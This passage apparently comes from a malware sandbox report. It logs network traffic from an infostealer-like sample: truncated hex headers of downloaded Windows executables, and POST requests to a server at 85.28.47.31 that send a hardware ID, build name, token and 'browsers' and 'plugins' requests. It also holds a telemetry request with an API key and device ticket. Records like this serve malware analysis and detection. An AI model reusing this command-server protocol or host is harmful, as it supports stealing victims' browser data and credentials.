00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 08:36:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:36:18 GMTContent-Type: application/octet-streamContent-Length: 1921024Last-Modified: Fri, 26 Jul 2024 07:32:05 GMTConnection: keep-aliveETag: "66a350f5-1d5000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 30 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4c 00 00 04 00 00 0a b4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 13 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 12 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 65 67 69 68 66 73 70 00 40 1a 00 00 e0 31 00 00 36 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 75 6b 66 6c 74 78 00 10 00 00 00 20 4c 00 00 04 00 00 00 2a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4c 00 00 22 00 00 00 2e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:36:21 GMTContent-Type: application/octet-streamContent-Length: 1912832Last-Modified: Fri, 26 Jul 2024 07:31:29 GMTConnection: keep-aliveETag: "66a350d1-1d3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 b0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4b 00 00 04 00 00 9d bc 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 95 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 95 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 61 6f 6d 65 64 6d 63 00 20 1a 00 00 80 31 00 00 18 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 68 6c 70 68 72 6e 6a 00 10 00 00 00 a0 4b 00 00 04 00 00 00 0a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4b 00 00 22 00 00 00 0e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:37:05 GMTContent-Type: application/octet-streamContent-Length: 253952Last-Modified: Fri, 26 Jul 2024 08:14:45 GMTConnection: keep-aliveETag: "66a35af5-3e000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c3 7d b8 f5 87 1c d6 a6 87 1c d6 a6 87 1c d6 a6 e8 6a 7d a6 9c 1c d6 a6 e8 6a 48 a6 97 1c d6 a6 e8 6a 7c a6 e4 1c d6 a6 8e 64 45 a6 8e 1c d6 a6 87 1c d7 a6 f6 1c d6 a6 e8 6a 79 a6 86 1c d6 a6 e8 6a 4c a6 86 1c d6 a6 e8 6a 4b a6 86 1c d6 a6 52 69 63 68 87 1c d6 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c1 0f db 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 86 03 02 00 00 00 00 5c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 86 54 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 58 02 00 64 00 00 00 00 80 04 02 f0 d7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 19 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 58 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 09 02 02 00 70 02 00 00 b6 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 d7 00 00 00 80 04 02 00 d8 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 08:37:09 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 07:30:51 GMTConnection: keep-aliveETag: "66a350ab-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1721983262778Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="hwid"F6ACD7DCE5231817704571------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="build"sila------DAKEBAKFHCFHIEBFBAFB--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="message"browsers------KEHJKJDGCGDAKFHIDBGC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="message"plugins------HIDHDGDHJEGHIDGDHCGC--
